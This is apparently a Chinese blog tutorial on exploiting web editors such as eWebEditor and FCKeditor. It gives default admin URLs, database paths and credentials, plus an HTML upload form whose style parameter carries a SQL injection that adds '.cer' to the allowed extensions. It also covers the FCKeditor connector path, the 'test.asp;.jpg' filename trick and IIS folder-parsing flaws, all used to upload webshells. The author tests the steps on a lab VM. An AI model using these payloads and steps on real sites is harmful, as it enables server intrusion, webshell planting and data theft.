常见的有Ewebeditor,fckeditor,ckeditor,kindeditor
链接:https://pan.baidu.com/s/18gW9bWE5LjbvNYwD8hGyPQ?pwd=uqk1
提取码:uqk1
Ewebeditor利用核心:
默认后台:www.xxxx.com/ewebeditor/admin_login.asp
默认数据库:ewebeditor/db/ewebeditor.mdb
默认账号密码:admin admin/admin888
访问:
删除.mdb:
访问:http://192.168.1.103:81/eWebEditor/db/ewebeditor.mdb
便可以下载】
或者右键点击权限:
博主用win7虚拟机试了试
好像账号是administrator 密码是xp的密码
样式管理设置一下,一定要有插入图片:
可以上传木马,jsp或者asp
或者打开html文件,内容为:
<form action="http://192.168.1.102:82/eWebEditor/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
也能上传木马
FCKeditor
查版本:
FCKeditor/_whatsnew.html
上传木马点:
/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
上传asp马:
test.asp;.jpg
上传asp马,找解析漏洞
我们这里创建文件夹,带asp的文件夹的文件在iis中间件中会当asp解析
上传木马:
访问地址:
userfiles/image/名称
应该成功了:
作者不清楚是哪里的问题;